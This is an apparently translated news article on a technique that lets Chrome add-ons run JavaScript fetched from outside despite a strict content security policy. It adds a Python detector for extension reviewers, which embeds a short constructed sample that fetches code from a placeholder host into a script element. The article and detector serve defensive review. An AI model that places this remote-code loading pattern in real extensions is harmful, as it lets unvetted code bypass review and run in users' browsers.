Vulnerability allowing Chrome add-ons to execute external code despite permissions

A method has been published that allows any Chrome add-on to execute external JavaScript code without being granted extended permissions (i.e. without unsafe-eval and unsafe-inline in manifest.json). The permission model implies that, without unsafe-eval, an add-on can only execute code shipped in its local distribution, but the proposed method makes it possible to bypass this restriction and execute arbitrary JavaScript loaded from an external site in the context of the add-on.

Google has closed public access to the problem report, but an archived copy preserves sample code exploiting the issue. The technique resembles a known method of bypassing the script-src 'self' restriction in a CSP: a script tag is created through document.createElement('script') and filled with external content obtained through the fetch function, after which the code runs in the context of the add-on itself.
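For reviewers of extension code, the pattern described above (a dynamically created script element whose body is filled from a fetch response, in an extension whose manifest does not grant unsafe-eval or unsafe-inline) is something a static check can surface. The following Python is an added example written for this article, not code from the report or from Google; the manifest, the JavaScript snippet and the regular expressions are constructed here and the pattern names are this example's own. It is a heuristic: obfuscated or indirect code will not match, so a hit is a prompt for manual review rather than proof of abuse.

```python
import json
import re

# Constructed sample manifest (MV3) that does NOT grant unsafe-eval or unsafe-inline,
# i.e. the configuration the article says should confine the add-on to bundled code.
SAMPLE_MANIFEST = json.dumps({
    "manifest_version": 3,
    "name": "sample-extension",
    "version": "1.0",
    "content_security_policy": {
        "extension_pages": "script-src 'self'; object-src 'self'"
    },
})

# Constructed sample source showing the shape the article describes:
# a <script> element built with createElement and filled from a fetch() response.
SAMPLE_SOURCE = """\
const s = document.createElement('script');
fetch('https://remote.example/code.js')   // placeholder host, constructed for this example
  .then(r => r.text())
  .then(t => { s.textContent = t; document.head.appendChild(s); });
"""

# Heuristic patterns worth a closer look during extension review (names are this example's own).
PATTERNS = {
    "dynamic_script_element": re.compile(r"createElement\(\s*['\"]script['\"]\s*\)"),
    "remote_fetch": re.compile(r"\bfetch\s*\("),
    "script_body_assignment": re.compile(r"\.(textContent|innerText|text|innerHTML)\s*="),
    "eval_like": re.compile(r"\b(eval|Function)\s*\("),
}


def check_manifest_csp(manifest_json: str) -> list:
    """Return findings about the extension's declared CSP (empty list means no eval/inline grants)."""
    manifest = json.loads(manifest_json)
    csp = manifest.get("content_security_policy", "")
    if isinstance(csp, dict):  # MV3 form: {"extension_pages": "..."}
        csp = csp.get("extension_pages", "")
    findings = []
    for token in ("'unsafe-eval'", "'unsafe-inline'"):
        if token in csp:
            findings.append(f"CSP grants {token}")
    return findings


def scan_source(source: str) -> dict:
    """Map each pattern name to the 1-based line numbers where it occurs in the JS source."""
    hits = {}
    for lineno, line in enumerate(source.splitlines(), 1):
        for name, rx in PATTERNS.items():
            if rx.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits


def assess(manifest_json: str, source: str) -> dict:
    """Combine both checks: flag the fetch -> script-element -> body-assignment chain."""
    hits = scan_source(source)
    chain_present = (
        "dynamic_script_element" in hits
        and "remote_fetch" in hits
        and "script_body_assignment" in hits
    )
    return {
        "csp_findings": check_manifest_csp(manifest_json),
        "pattern_hits": hits,
        "flag_remote_code_injection": chain_present,
    }


if __name__ == "__main__":
    print(json.dumps(assess(SAMPLE_MANIFEST, SAMPLE_SOURCE), indent=2))
```

Running the block on the constructed sample reports an empty `csp_findings` list (the manifest is strict) together with `flag_remote_code_injection` set to true, which is exactly the combination the article describes: a restrictive policy in the manifest does not by itself rule out remotely loaded code, so the source still has to be reviewed.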

Source: opennet.ru